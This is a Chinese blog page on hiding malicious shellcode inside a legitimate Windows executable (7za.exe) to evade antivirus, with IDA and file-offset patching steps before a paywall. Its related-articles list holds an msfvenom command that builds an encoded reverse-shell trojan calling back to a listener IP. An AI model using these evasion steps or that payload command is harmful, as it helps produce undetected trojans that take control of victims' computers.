一种基于patch免杀技术的自动化实现

最新推荐文章于 2025-05-04 00:00:23 发布
最新推荐文章于 2025-05-04 00:00:23 发布
阅读量977 收藏 16
点赞数 23
文章标签: 自动化 python 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39796925/article/details/140804433
版权

一种基于patch免杀技术的自动化实现

起因

先从一个样本分析开始 https://www.52pojie.cn/thread-1900852-1-1.html
从标题“三年了,还是VT全绿,它到底凭什么?”
可以分析得到这个样本的静态特征非常不明显
具体原因简单来说就是:白文件执行流程中的某函数被修改为恶意shellcode代码

理论

  • 你需要掌握的
    • PE文件结构
    • shellcode编写
    • IDA基础分析
  • 我来讲讲 例子:7za.exe
    • 先来一个概念 地址
      • 虚拟地址 但PE bear给的虚拟地址是RVA
      • 用CFF Explorer转换一下
      • VA就是0000000140001000
      • FO文件偏移就是00000400
    • IDA分析
      • 将例子程序拖入IDA
      • IDA贴心的直接定位到了main函数
      • 这个程序的main函数调用的函数只有两个
        • sub_14004E4A0
        • sub_1400550B0
      • 既然要patch就得满足几个条件
        • 目标函数大
        • 目标函数必定在主函数执行流程中
        • 目标函数尽量在text段首
        • 要patch的shellcode体积尽量小
        • sub_14004E4A0 太小了 不行
        • sub_1400550B0 很大 可以
      • 用CFF转换得到FO
      • 000544B0
      • 用010手动开始patch
最低0.47元/天 解锁文章
余吉233
关注
Kali linux 学习笔记(八十四)——backdoor-factory 2020.4.20
闵行小鱼塘
04-20 865
本节学习backdoor-factory,了解下代码洞的用法
运维:自主编码实现运维自动化的转型之旅
京东零售技术的博客
02-19 1335
本文介绍如何衡量运维自动化率,并提供一个支持编码的平台。通过运维编码实现运维自动化,让运维工作迈入新的时代
记一次Patch exe 文件实现的静态
hot_milk1的博客
07-28 301
于是想着动手试一试,学习一下大佬们的思路,并记录下来,仅适用于 64 位的 exe。在编写完 shellcode 后,剩下的就是寻找 exe 文件,合适的 exe 文件非常之多,他们自带大量的正常程序所拥有的代码,可以很好的规避软的静态查,如果再加上动态查的技术例如 syscall、白加黑等利用方式,或许是一种比较好的方式。优点:在编写完 shellcode 后,这种方式可以快速生成马,作为冲锋马,且比较灵活,由于程序具备大量正常代码,比起普通加载器,软的特征库更新的没那么快。
简单的流程,软件使用方法与一点思路(Cobalt-strike)
weixin_74182283的博客
04-04 2284
字面意思,就是恶意软件或者木马,通过对其进行修改,导致毒软件扫描时会默认这款恶意软件是个安全的软件,导致恶意软件成功上传到电脑。通常在渗透测试的过程中,想要进入别人内网,就需要通过一些木马或者一些程序上传至别人内网,从而得到对方内网的权限。正常情况下,linux内可能没啥毒软件,但windows系统下的毒软件就各种各样,而我们的木马刚传上去就会被掉,这时如果懂得如何去对上传的马做一个,使其顺利通过防火墙就显得非常重要了。
BinarySpy:一款自动化的二进制文件Shellcode注入工具
gitblog_00834的博客
03-27 229
BinarySpy:一款自动化的二进制文件Shellcode注入工具 BinarySpy 一个手动或自动patch shellcode到二进制文件的工具/A tool for manual or automatic patch shellcode into binary file oder to bypass AV....
工具分享 | BinarySpy - 一个手动或自动patch shellcode到二进制文件的工具。
IT软件汇
09-13 264
工具分享 | BinarySpy - 一个手动或自动patch shellcode到二进制文件的工具。
1.9 动态解密ShellCode反弹
优快云
08-31 5651
动态解密执行技术可以对抗软的磁盘特征查。其原理是将程序代码段中的代码进行加密,然后将加密后的代码回写到原始位置。当程序运行时,将动态解密加密代码,并将解密后的代码回写到原始位置,从而实现内存加载。这种技术可以有效地规避软的特征码查,因为加密后的代码通常不会被标记为恶意代码。
基于python的接口自动化测试框架讲解用PPT
11-19
### 基于Python的接口自动化测试框架知识点详解 #### 一、接口自动化测试框架概述 1. **测试金字塔模型**: - **定义**:采用金字塔形状展示不同层次的测试类型及其相对比重的一种模型。 - **层级划分**: - **...
基于加权核范数最小化算法实现图像去噪附matlab代码
10-27
本教程将介绍一种基于加权核范数最小化(Weighted Nuclear Norm Minimization, WNNM)的图像去噪方法,并提供MATLAB 2019a版本的实现代码。 一、加权核范数最小化(WNNM)算法原理 加权核范数最小化是一种在稀疏...
Context-Aware Patch Generation for Better Automated Program Repair -上下文感知补丁生成更好的自动化程序修复
cxt707259130的博客
03-21 593
上下文感知补丁生成更好的自动化程序修复文章记录 摘要 基于搜索的自动程序修复的有效性受限于能够成功生成的正确补丁的数量。造成这种限制的原因有两个。首先,搜索空间不包含正确的补丁。第二,搜索空间太大,无法生成正确的patch(即正确的patch要么是在错误的貌似正确的patch之后生成,要么是在预算的时间内没有生成)。为了增加在搜索空间中包含正确补丁的可能性,我们建议在AST节点方面以较细的粒度进行工作。然而,这将进一步扩大搜索空间,增加找到正确补丁的挑战。我们通过设计一种策略来根据候选补丁正确的可能性对其进
2023-06-28-[学习]shellcode的使用(C++)
qq_42585535的博客
06-29 808
功能:调整一片在虚拟地址空间的内存的状态返回值:调指向整的内存的起始地址的指针win api为了准确的表达指针的作用对象,将void命名为了许多其他类型,但其本质都是voidvoid类型是一种无类型指针,也就是说它可以指向任意类型的数据用作函数的返回类型,表示函数不返回任何值。用作函数的参数类型,表示函数可以接受任意类型的指针。例如,内存分配函数 malloc 和 memset 的参数就是 void* 类型。
Kali Linux渗透测试——基础
Captain_RB的博客
06-01 2528
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录一、基础概念(一)恶意软件(二)防护手段(三)免杀技术二、工具介绍(一)Msfvenom(二)Veil-evasion(三)Backdoor-factory 一、基础概念 (一)恶意软件 在用户非自愿情况下执行安装,具有控制、窃取、勒索、攻击等恶意功能的软件,基本分类如下: 病毒:独立存在或者插入在计算机程序中的恶意代码,可通过隐蔽复制进行传播 蠕虫:可以通过网络进行传播的病毒 木马:通过伪装诱使用户运行程序,达到远程控制、破.
第十六章
09-11 417
恶意软件  – 病毒、木马、蠕虫、键盘记录、僵尸程序、流氓软件、勒索软件、广告程序  – 在用户非自愿的情况下执行安装  – 处于某种恶意的目的:控制、窃取、勒索、偷窥、推送、攻击............ 防病毒软件▪ 恶意程序最主要的防护手段  – 毒软件 / 防病毒软件  – 客户端 / 服务端 / 邮件防病毒▪ 检测原理  – 基于二进制文件中特征签名的黑名单检测方法  – 基...
常见的几种方法
路虽远,行将至。事虽难,做必达。
03-05 6842
攻击机kali:192.168.1.11 靶机Windows7:192.168.1.18 1、自编码 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe 开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用 微步沙箱检测结果,检出率近一半,效果一般 ​​​ ...
EWM 流程全自动化实现方法
ERP 搬运工
04-30 754
实现端到端的 EWM 流程自动化
案例:自动化获取Web页面小说(没钱修什么仙)——selenium
lieyingJ的博客
05-01 1165
提示:通过案例掌握selenium语法涉及技术:Python + Selenium。
【Vagrant+VirtualBox创建自动化虚拟环境】Ansible-Playbook
xbd_zc的博客
04-29 1014
Vagrant+VirtualBox创建自动化虚拟环境,Ansible-Playbook
Cycleresearcher:通过自动化评审改进自动化研究
最新发布
毕竟是Shy哥
05-04 804
迄今为止,整个科学发现过程自动化的挑战在很大程度上仍未解决,特别是在生成和改进符合同行评审工作高标准的研究成果方面。此外,很少有工作涉及迭代反馈的整合,这对保持学术的健全性和新奇至关重要。当前的模型往往难以适应整个研究阶段,突出了它们在进行全面、多步骤科学发现的能力方面的差距。科学过程的核心是提交、同行评审和改进的迭代循环–这是一种维持学术工作质量和完整性的既定机制。来自审稿人和同行的反馈在这一周期中发挥着关键作用,提供了有助于研究人员改进工作并提高其严谨性和影响力的见解。从这一循环过程中得到启发,我们提出
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值